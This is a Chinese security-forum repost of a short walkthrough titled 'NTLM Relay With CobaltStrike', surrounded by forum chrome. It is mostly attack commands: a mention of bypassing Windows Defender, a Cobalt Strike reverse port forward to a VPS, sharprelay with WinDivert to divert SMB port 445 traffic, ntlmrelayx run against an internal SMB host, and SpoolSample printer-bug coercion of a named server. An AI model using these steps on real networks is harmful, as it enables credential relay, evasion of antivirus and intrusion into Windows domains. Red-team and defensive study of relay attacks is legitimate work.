设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 NTLM Relay With CobaltStrike
返回列表 发新帖
查看: 6630|回复: 0

NTLM Relay With CobaltStrike

[复制链接]
gclome

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-2-5 20:50:32 | 显示全部楼层 |阅读模式
原文链接:NTLM Relay With CobaltStrike

NTLM Relay With CobaltStrike
PS: 个人感觉这个工具让Relay攻击更加丝滑了.
以及前置知识去这里了解https://daiker.gitbook.io/windows-protocol/
Upload

先Bypass WD



这个KIT的代码我分享过了

.



Execute把内网目标的8444端口转发到VPS

  • rportfwd 1314 127.0.0.1 8444
把内网主机的445端口流量转发到他本地的8444




  • sharprelay server1 "C:\Users\administrator\Desktop\Check\Wing\WinDivert64.sys" 445 8444

Relay Start

攻击75的机器

  • proxychains4 python ntlmrelayx.py -t smb://192.168.123.75 -smb2support -no-http-server
配合打印机服务漏洞

  • SpoolSample owa2013.rootkit.org 192.168.123.74

原文地址
https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/


回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 21:49 , Processed in 0.012462 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表